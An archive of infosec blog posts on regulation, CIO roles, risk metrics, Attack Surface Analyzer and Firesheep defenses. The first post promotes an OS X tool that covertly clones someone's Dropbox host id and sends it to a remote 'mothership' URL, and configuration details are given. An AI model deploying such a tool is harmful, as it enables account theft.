Skip navigation

Category Archives: Information Security

UPDATE: Check out the newer post on additional features.

There has been much ado of late about Dropbox security with one of the most egregious issues being how easy it is to surreptitiously “clone” someone else’s Dropbox by obtaining just one piece of data – the host id – from the Dropbox SQLite config.db.

Moloch built a Windows & Linux impersonation/cloning utility in Python that was/is meant to be used from a USB/external volume. The utility can save the cloned host id to a local file and also has the capability to use a simple HTTP GET request to log data to a “mothership” web site.

Since many Dropbox users use OS X (including me) I didn’t want them to feel left out or smugly more secure. So, I set about creating a native version of the utility.

This release is not as feature-rich as Moloch’s Python script but it won’t take much more effort to crank out a version that duplicates all of the functionality. “Release early. Release often.” as the kids these days are wont to say.

You can find the source at its github repository. When building it or just downloading & running the executable (see below), you should heed the repo’s README and take care to change the following items in the application’s Info.plist property list:

  • MothershipURL – this is the URL of the remote host you want to store the cloned info to. It defaults to somesite.domain/mothership.php to avoid accidentally sending your own Dropbox data to a remote host. PLEASE NOTE that you will need to get the mothership.php script from the original Windows/Linux code distribution as I have not asked for permission to distribute it here. You can grab the original dbClone.rar directly from here: dl.dropbox.com/u/341940/dbClone.rar (I love the irony of it being hosted on Dropbox itself).

    ALSO NOTE that there’s no need to modify the application’s property list if you don’t mind typing in a URL each run. I eventually plan on making this a separate property list file that allows for multiple URLs so you can select it from a drop-down (and still type a new one if you like).

  • LogFilenamejust include the filename you want to use when storing the cloned info locally if you do not like the default (it’s the same as Moloch’s – "GroceryList.txt"). It defaults to the top-level of the mounted volume (the original Linux & Windows dbClone was meant to be run from a USB/external volume) or "~/" if running it on your boot drive.

You can use the property list editor(s) that come with Apple’s Developer Tools or use vim, TextEdit, TextWrangler (or your favorite text editor) and modify these lines appropriately:

[code]
<key>LogFilename</key>
<string>GroceryList.txt</string>
<key>MothershipURL</key>
<string>http://somesite.domain/mothership.php</string>
[/code]

If you do use the “backup” option, the current naming scheme is "backup-config.db" and it”s important to note that the program will not attempt to overwrite the file. I may change that behaviour in an upcoming release.

I tested the build on OS X 10.6.7 but the Xcode project is set to build for compatibility with 10.5.x or 10.6.x. Feedback on behaviour on other systems would be most welcome.

If you just want the executable, grab the zip’d app and give it a go.

Any and all feedback is welcome (via github or in the comments).

Had to modify the latimes URL in the post due to a notice from Wordfence/Google

I was reviewing the – er – highlights? – from the ninth ERM Symposium in Chicago over at Riskviews this morning and was intrigued by some of the parallels to the current situation in enterprise security risk management (the ERM symposium seemed to be laser-focused on financial risk, which is kinda sad since ERM should make security/IT compliance risk a first class citizen). Not all topics had a 1:1 parallel, but there were some interesting ones:

  • Compliance culture of risk management in banks contributed to the crisis :: While not necessarily at crisis levels yet, the compliance culture that is infecting information security is headed toward this same fate. Relying on semi-competent auditors to wade through volumes of compensating controls and point-in-time reviews to deliver ✓’s in the right boxes is not a recipe for a solid security program that will help mitigate and respond effectively to emerging threats.
  • Banks were supposed to have been sophisticated enough to control their risks :: I’ll focus on medium-to-large enterprises for this comparison, but I’m fairly confident that this is a prevalent attitude regarding information security in corporations across the globe (“We manage information risk well“). Budgets seem to be focused on three fundamental areas that non-security-folk can conceptually grasp: firewalls (stop), traditional anti-virus (block) and endpoint disk encryption (scramble). By now, with a decade of OWASP failures [PDF, pg 28], a multi-year debate about anti-virus efficacy and ample proof that vendors suck at building secure software as evidence, you’d think we’d be focusing on identifying the areas of greatest risk and designing & following roadmaps to mitigate them.

    This may be more of a failure on our part to effectively communicate the issues in a way that decision makers can understand. While not as bad as the outright lying committed by those who helped bake the financial meltdown cake, it is important to call out since I believe senior management and company boards would Do The Right Thing™ if we effectively communicated what that Right Thing is.

  • Regulators need to keep up with innovation and excessive leverage from innovation. :: The spirit of this is warning that financial regulators need to keep a sharp eye out for the tricky ways institutions come up with to get around regulations (that’s my concise summary of “innovation”). Think “residential mortgage-backed securities”. The “excessive leverage” bit is consumers borrowing way too much money for over-priced houses.

    I’m not going to try to make a raw parallel, but just focus on the first part: Regulators need to keep up with innovation. The bad guys are getting more sophisticated and clever all the time and keep up with hot trends faster than we can defend against them…due in part to our wasted time testing controls and responding to low-grade audit findings. When even the SOX compliant security giants can fall hard, you know there’s a fundamental problem in how we are managing information security risk. Regulators & legislators need to stop ( http:// articles. latimes. com /2011/feb/11/business/la-fi-0211-privacy-20110211 ) jerking knees and partner with the best and the brightest in our field to develop new approaches for prescribing and validating security programs.

  • ERM is not an EASY button from Staples :: I’m *so* using that quote in an infosec context this week
  • Many banks and insurers should be failing the use test for ERM regulation to be effective. :: More firms need to fail SOX and PCI and [insert devastating regulation acronym here] checks or SOX & PCI requirements need to change so that we see more failing. Pick one SOX and PCI compliant company at random and I’ll bet they have at least one exploitable Internet-based exposure or that custom-crafted malware can get through. If we start making real, effective, and sane regulations, we’ll start contributing to the betterment information security in organizations.
  • Stress testing is becoming a major tool for regulators. :: What if regulators did actual stress testing of our security controls versus relying on point-in-time checks? I know that the stress tests for banks end up being a paper exercise, but even those exercises have managed to find problems. Come in, pick three modern exploit vectors and walk-through how company defenses would hold up.
  • Regulators need to be able to pay competitive market salaries :: we need smarter rule-makers and examiners. There are good people doing good work in this space, just not enough of them.
  • Difficult for risk managers to operate under multiple constraints of multiple regulators, accounting systems. :: Just domestically, 42 states with separate privacy regulations, SOX for public companies, PCI compliance for those who process credit cards and independent infosec auditing standards across any third-party one needs to do business with make it almost impossible to stop spinning around low-level findings and focus on protecting critical information assets. We need to get to a small number of solid standards that we can effectively understand and design solutions to meet.
  • Nice tree/forest story: Small trees take resources from the forest. Large trees shade smaller trees making it harder for them to get sunlight. Old trees die and fall crashing through the forest taking out smaller trees. :: This made me think of the rampant consolidation of the security tech industry. Savvy, nimble & competent boutique vendors are being swallowed by giants. The smart people leave when they can and the solutions are diluted and become part of a leftover stew of offerings that don’t quite fit together well and are not nearly as effective as they once were.
  • Things that people say will never go wrong will go wrong. :: “We’ll never have a SQL injection. Our mobile devices will never get malware on them. Those users will never figure out out to do [that thing], why should we spend time and resources building it correctly?”
  • Compliance should be the easy part of ERM, not the whole thing :: So. True.
  • Asking dumb questions should be seen as good for firm. 10th dumb question might reveal something that no one else saw. :: This needs to be a requirement at everyone’s next architecture meeting or project initiation meeting. At the very least, do something similar before you let someone open up a firewall port.
  • There is a lack of imagination of adverse events. US has cultural optimism. Culture is risk seeking. :: Can be easily seen in our headstrong rush into consumerizing IT. I find that architects, engineers and application developers tend to see 1-2 “security moves” out. We need to do a better job training them to play Go or Chess in the enterprise.
  • People understand and prefer principles based regulation. But when trust is gone everything moves towards rules. :: If firms had been Doing The Right Thing™ in information security when they had the chance, we wouldn’t be in the state we are in now. I can’t see us getting [back] to principled-based regulation any time soon.
  • Supervisors need to learn to say no :: How many firewall port opens, disk-encryption exclusions, anti-virus disables and other policy exceptions have you processed just this past week? How many defenses have you had to give up during an architecture battle? Non-infosec leaders absolutely need to start learning how to say “no” when their best-and-brightest want to do the wrong thing.
  • Caveat Emptor :: Don’t believe your infosec vendors
  • A risk metric that makes you more effective makes you special. :: We have risk metrics? Seriously, tho, if we can measure and report risk effectively, our infosec programs will get better.

I may have missed some or got some wrong. I’d be interested in any similarities or differences other saw in the list or if you think that I’m overly cynical about the state of affairs in infosec risk.

This morning, @joshcorman linked to an article in the Harvard Business ReviewThe Conversation” blog that put forth the author’s view of The Four Personas of the Next-Genereation CIO. The term persona is very Jungian and literally refers to “masks worn by a mime”. According to Jung, the persona “enables an individual to interrelate with the surrounding environment by reflecting the role in life that the individual is playing. In this way one can arrive at a compromise between one’s innate psychological constitution and society.1

So, the jist of the article is that there are four critial roles that the new CIO must play to succesfully interrelate with and orchestrate the IT environment within their business. I believe this provides a context to dovetail information security & compliance components within personas (since none of them are overtly infosec or compliance), essentially facilitating a compromise between the innate desire to “do the right thing” – i.e. compliance/security – (which I do believe most CIOs possess) and the initiatives that stem from these personas which appear to be – on the surface – in direct conflict. As Josh pointed out, this gives us – the professionals that support our CIOs – an opportunity to help rather than obstruct. Let’s take a look at each of the four personas and what parts of information security & compliance are critical to the real success of each role.

Chief “Infrastructure” Officer

Key points:

  • cost reduction
  • accounts for 70% of IT budget
  • “lights on” focus
  • needs to maintain legacy environments while trying to integrate disruptive technologies
  • internal-facing

This area is where most IT information security & compliance dollars are spent and typically involve personnel & legacy security technology costs (e.g. firewalls and traditional anti-virus) and contribute to the overall budget impact of verifying the efficacy of established controls (i.e. audits).

The best way to help this CIO persona is to ensure that your organization is only spending what it needs to in order to safeguard the information at risk and can be facilitated through regular and repeated risk assessments which prioritize the systems, networks and applications that require the most protection and enable the design & implementation of automated controls in these environments.

Government and industry regulations, third party business partner mandates and internal audit requirements are all factors in the risk assessment process, so there should be no surprises when the auditors come around. Furthermore, this risk assessment process will ultimately ensure that the controls are operating as efficiently as your organization can support with as little resource consumption as possible. It will also help shed light on controls that are missing or ineffective (both the first time through and as you perform regular validations). If you don’t believe compliance has a budget impact, take a look at the True Cost of Compliance report by Ponemon Instutite & Tripwire, Inc.

Solid and well-integrated risk assessment methodologies will speed up infrastructure and application deployment times as there will be no last-minute security surprises that either hold up a rollout or cause compliance problems at a later date due to them not being properly considered. By driving manual control costs to automation, focusing on the right risks and keeping the compliance folks satisfied, you will provide your CIO the tools she needs to keep the lights on and the budget requried to correctly integrate new technologies.

Chief “Integration” Officer

Key points:

  • connect internal & external ecosystems
  • accounts for 10% of IT budget
  • connects disperate processes, data, systems, etc
  • M&A-centric
  • external- & internal-facing

Of all the areas, I believe this one presents the best opportunity for our profession to shine and deliver the most value to IT & the business. They key is to weed out all “Doctor No’s” in your organization. The “Doctor No” basically says “No” to every ” can we do ‘x'” questions, which is at the heart of all the activities this CIO persona needs to perform. For example:

Senior Business Analyst: “Can we connect these systems to this cloud service?”
Security Analyst: “NO! Of course not, you fool!”

Moving from “No” to enabling the business to operate in a secure fashion is an extension of the risk management practices that make the Infrastructure persona successful and needs to be combined with a strong Security Architecture program. For every connection, identify the non-negotiable compliance requirements as factors in a thoughtful risk assessment process. Communicate the “must-haves” and the risk finding to the business & IT stakeholders and enable them to make an informed decision with innovative and/or time-tested architecture options.

Business owners are used to taking risks all the time (or just going out of business if they fail to take on risks regularly) and security/compliance risks are no different except that most senior executives are far more familiar with traditional risk management activities and need your help integrating security & compliance risk understanding into their existing knowledge-base.

Natural by-products of your support in this area will be:

  • an understanding of the benefits of a data classification system (so your CIO will know what she really does need to protect),
  • an appreciation for the development of lightweight, repeatable process during the early stages of analysis & integration design, and
  • a comprehension of the inherent, legitimate risks in the environment

which will all support more efficient acquisition and integration endeavours (and, I can’t think of one CIO that would be against increased efficieny in those areas).

Chief “Intelligence” Officer

Key points:

  • actionable insight
  • accounts for 10% of IT budget
  • improves business-user access to information
  • right data to right person at right time on right interface
  • internal-facing

This area has a similar reliance on a robust data classification program and can be more easily facilitated via a robust identity and access management program. To make your CIO successful, you will need to help her work with the business to identify the information assets to be incorporated into each business intelligence (BI) initiative and ensure they are classified by their owners/stakeholders. There’s a good chance you’ll need to re-think your access control infrastructure architecture as well since you will be facing users armed with iPads, Macs and modern web client technologies that you’ve managed to avoid up until now.

To ensure these BI activities will not just add to audit findings it will be important to incorporate regular access rights reviews into the mix since authentication and authorization will be the most robust control points. Perhaps this will also be a way to start the discussion on moving from archaic username and password credentials to multi-factor authentication, adaptive authentication or even a full-on migration to PKI. You will not have a better time than now for showing how these solutions enable better access control and give even more options even in the general application space.

Finally, with all of this information flying through your network this may be the most opportune time to research what DLP solutions are available and how they might be deployed (one size and even one solution does not fit all) to ensure the business is retaining as much control over the data as it wants (risk management always seems to sneak its way in).

Remember, the goal is to facilitate the business operations with as little disruption as possible. Getting in up-front with your ideas and solutions will make your CIO much more effective in orchestrating successful BI programs and projects.

Chief “Innovation” Officer

Key points:

  • pilots disruptive technologies
  • accounts for 10% of IT budget
  • move fast; fail fast; move on
  • externa-facing

I like shiny objects as much as the next tech-SQUIRREL!-and many CIOs do as well. Who wouldn’t want to arm their workforce with iPads connected to VDI sessions in the cloud (shameless SEO-inspired sentence)? Seriously, though, the modern CIO must regularly push IT & business users and management out of their comfort zones to avoid having their whole shop turn into a data center maze of twisty legacy deployments. Even if the mainframe is still king in many large shops, getting that data into the hands of consumers wielding iOS and Android devices will be crucial to the ongoing success of each enterprise (and, that’s just today).

Moving beyond traditional development models and languages and embracing faster, lighter and domain-specific tools is also part of the equation. Rapid code updates across far more platforms than you are use to will eventually be the norm. And, deployment models that involve traditional systems, internally dynamically provisioned application spaces and external content and hosting providers will almost be a necessity for business to succeed.

You must be prepared to have your organization adapt with these changing models. Make sure your staff is part of initiatives like the Cloud Security Alliance, OWASP and Rugged. Keep up with disruptive innovators and embrace the challenge of working with these groups instead of fighting against them.

You will need to help your CIO bake security and compliance checkpoints all throughout the exploratory and development phases of these risky endeavours. Identifying compliance pitfalls will be paramount as the regulatory bodies and auditors are even less apt to embrace change than your security teams are, never mind the monumental and drawn-out tasks of making any changes to established regulatory requirements. Working to help these efforts succeed is great, but you also need to take care to avoid being the reason they fail (especially if that’s not due solely to a compliance problem).

I believe this new model of modern CIO will be very willing to work with a information security/risk/compliance group that exhibits even some of the qualities listed above. It won’t be easy (hey, it isn’t now) but it will give you the most opportunity to be successful in your program(s) and be one of the most critical components in enabling your CIO to respond to ever changing business needs and ventures.

NOTE: This is a re-post from a topic I started on the SecurityMetrics & SIRA mailing lists. Wanted to broaden the discussion to anyone not on those (and, why aren’t you on them?)

I had not heard the term micromort prior to listening to David Spiegelhalter’s Do Lecture and the concept of it really stuck in my (albeit thick) head all week.

I didn’t grab the paper yet, but the abstract for “Microrisks for Medical Decision Analysis” seems to be able to extrapolate directly to the risks we face in infosec:

“Many would agree on the need to inform patients about the risks of medical conditions or treatments and to consider those risks in making medical decisions. The question is how to describe the risks and how to balance them with other factors in arriving at a decision. In this article, we present the thesis that part of the answer lies in defining an appropriate scale for risks that are often quite small. We propose that a convenient unit in which to measure most medical risks is the microprobability, a probability of 1 in 1 million. When the risk consequence is death, we can define a micromort as one microprobability of death. Medical risks can be placed in perspective by noting that we live in a society where people face about 270 micromorts per year from interactions with motor vehicles.

Continuing risks or hazards, such as are posed by following unhealthful practices or by the side-effects of drugs, can be described in the same micromort framework. If the consequence is not death, but some other serious consequence like blindness or amputation, the microrisk structure can be used to characterize the probability of disability.

Once the risks are described in the microrisk form, they can be evaluated in terms of the patient’s willingness-to-pay to avoid them. The suggested procedure is illustrated in the case of a woman facing a cranial arteriogram of a suspected arterio-venous malformation. Generic curves allow such analyses to be performed approximately in terms of the patient’s sex, age, and economic situation. More detailed analyses can be performed if desired.

Microrisk analysis is based on the proposition that precision in language permits the soundness of thought that produces clarity of action and peace of mind.”

When my CC is handy and I feel like giving up some privacy I’ll grab the whole paper, but the correlations seem pretty clear from just that bit.

I must have missed Schneier’s blog post about it earlier this month where he links to understandinguncertainty.org/micromorts which links to plus.maths.org/content/os/issue55/features/risk/index (apologies for the link leapfrogging, but it provides background context that I did not have prior).

At a risk to my credibility, I’ll add another link to a Wikipedia article that lists some actual micromorts and include a small sample here:

Risks that increase the annual death risk by one micromort, and their associated cause of death:

  • smoking 1.4 cigarettes (cancer, heart disease)
  • drinking 0.5 liter of wine (cirrhosis of the liver)
  • spending 1 hour in a coal mine (black lung disease)
  • spending 3 hours in a coal mine (accident)
  • living 2 days in New York or Boston (air pollution)

I asked on Twitter if anyone thought we had an equivalent – a “micropwn“, say – for our discipline. Do we have enough high level data to produce a generic micropwn for something like:

  • 1 micropwn for every 3 consecutive days of missed DAT updates
  • 1 micropwn for every 10 Windows desktops with users with local Administrator privileges
  • 1 micropwn for every 5 consecutive days of missed IDS/IDP signature updates

Just like with the medical side of things, the micropwn calculation can be increased depending on the level of detail. For example (these are all made up for medicine):

  • 1 micromort for smoking 0.5 cigarettes if you are an overweight man in his 50’s
  • 1 micromort for smoking 0.25 cigarettes if you are an overwight man in his 50’s with a family genetic history of lung cancer

(again, I don’t have the paper, but the abstract seems to suggest this is how medical micromorts work)

Similarly, the micropwn calculation could get more granular by factoring in type of industry, geographic locations, breach histiory, etc.

Also, a micropwn (just like micromort) doesn’t necessarily mean “catastrophic” breach (I dislike that word as I think of it as a broad term when most folks associate it directly with sensitive record loss). Could mean successful malware infection in my view.

So, to further refine the question I originally posed on Twitter: Do we have enough broad data to provide input for micropwn calculations and can we define a starter-list of micropwns that would prove valuable in helping articulate risk within and outside our discipline?

If you’re preparing to install Windows 7 or Windows Server 2008 R2 Service Pack 1, now would be a good time to give Microsoft’s Attack Surface Analyzer a spin. ASA takes a baseline snapshot of your system state and then lets you take another snapshot after any configuration change or product installation and displays the changes to a number of key elements of the Windows attack surface, including analysis of changed or newly added files, registry keys, services, ActiveX Controls, listening ports, access control lists and other parameters.

Ideally, you’d take your baseline after a fresh install of your workstation or server from known, good media/images and after your own base configuration changes.

This would also be a good thing to do when building your base VM images so you can then validate their state as you duplicate and modify VDIs.

The installation of a Service Pack is a pretty radical change to your environment. If you run ASA prior to the SP install you can see if there are any significant changes to your system’s security profile after the bundle of patches and hotfixes are put down. You could also use the SP1 event to baseline post-install, provided you’ve done as thorough of a malware & rootkit sweep as can be done (you still cannot truly trust the results).

It may take some discipline to run ASA regularly on your personal systems every time you update software or drivers. IT shops should have an easier time scripting ASA during system deployments as well as application code updates. In either scenario, this free tool from Microsoft should help make you a more informed user and also aid you in building and maintaining more secure systems.

See also: MSDN SDLC blog post on the new Attack Surface Analyzer

By now, many non-IT and non-Security folk have heard of Firesheep, a tool written by @codebutler which allows anyone using Firefox on unprotected networks to capture and hjijack active sessions to popular social media sites (and other web sites). The sidebar/extension puts an attactive and easy-to-understand GUI over a process that “real” security people have been using for as long as there has been http-based sessions.

I’ve been using Firesheep quite a bit in non-echo-chamber demos to help illustrate some of the core issues facing enterprises and individual users. A big question that comes out of each demo is “what can I do to safeguard my access to Facebook?”. I provide quick guidance on-the-spot to interested individuals and wanted to share what I communicate to them here both to help a broader audience and get feedback on other steps users can take to safeguard their connections.

General Guidance

The first action I tell users to take is an anti-action: if at all possible, never use free/unsecured Wi-Fi connections. While there are ways of grabbing sessions and other data on wired or secure Wi-Fi networks, the means to do so are beyond the capabilities of most Firesheep users. The danger is still present and you should always consider how much you trust the network you are on when accessing anything on the Internet, but the risk is greatly diminished.

If users are unable or unwilling to follow that first action (and even if they do avoid insecure networks) I then instruct them to ensure that all services they access always use “https (SSL/TLS) which encrypts the communication and prevents tools like Firesheep from working. It still – much like the first action – doesn’t stop determined & skilled attackers.

I then caution users on smartphones and tablets to also make sure any applications they use also communicate over SSL. This is far too easy to overlook and can leak data just as easily as a web browser. Tablet & smartphone users can also switch to only using 3G connections to make it that much more difficut for otherrs to eavesdrop.

Finally, I suggest using a virtual private networking (VPN) service such as PureVPN to secure all their connections – not just browser sessions – on public networks (secured or otherwise). SSL/TLS connections are potentially susceptible to what is called a man-in-the-middle (MITM) attack [SANS Reading Room (PDF)] and one way to mitigate that threat is to use a VPN to secure all network communication using a more robust/holistic solution. PureVPN (and other, similar good services) are not free, but $5.00-10.00USD per month is not much to pay for personal data security on-the-go.

The Elephant In The Room

For some reason, even with that general guidance, the whole concept of someone hijacking their Facebook account really scares folks and many end up asking specific question on ensuring their Facebook access is protected. This usually involves walking them through how to check to see if SSL is enabled by Facebook’s service and also how to monitor access to their Facebook account.

Unsurprisingly, Facebook does not make setting SSL as a default an easy task. It’s unintuitively not under any “privacy” settings. Instead, you need to navigate down to account settings and poke around to get to the right areas. The screen captures below show the navigation sequence. You’ll notice that this account does not have security enabled since it’s the one I use for demos (I do not have a personal Facebook account).

Getting to Facebook Account Settings

Location of Facebook Account Security Settings

Facebook SSL Settings

You’ll also notice that you can have Facebook send you an e-mail when there is an access to your account from an unknown device and also review recent activity on your account. This gives you the ability to be in control as much or as little as you desire.

Homeward Bound

I usually close with guidance on securing your home Wi-Fi network. Many users still have an aging 802.11b/g router that barely does wired-equivalent-privacy (WEP) security. Even newer Wi-Fi equipment with Wi-Fi Protected Access (WPA/WPA2) may not be enough as you or someone else in your house most likely handout the access password to any guest you allow in the residence. Any malware on their systems now has the potential to infect other systems on your network and you have also given the keys to your local security to someone you may not fully trust. Many of the newest Wi-Fi access points – such as Apple AirPort Extremes and Netgear N[3|6]00s – provide for the ability to setup both a protected internal network and as open of a guest network as you want. I still suggest ensuring that the guest network be secured as you may be liable for any actions taken from your network (protected or otherwise).

Highway Safety

Being safe[r] on the Internet is much lke being safe[r] when driving a car. You need to make sure the fluids are at the right levels, that the tire pressure is sufficient for the driving conditions and that you wear your seatbelt before leaving the driveway. If you don’t regularly perform those tasks you run the risk of significant problems out on the road. You need to get in the habit of doing similar checks when navigating in potentially dangerous network territory as well. It doesn’t help that Facebook cares not a whit about your privacy or security and will seemingly randomly change your settings if it benefits them (or if they are just their usual incompetent selves). Want proof? You have to be diligent in the maintenance of all Internet security settings to ensure your consistent, personal online safety.

You were right…(UPDATED with PK talk appearance )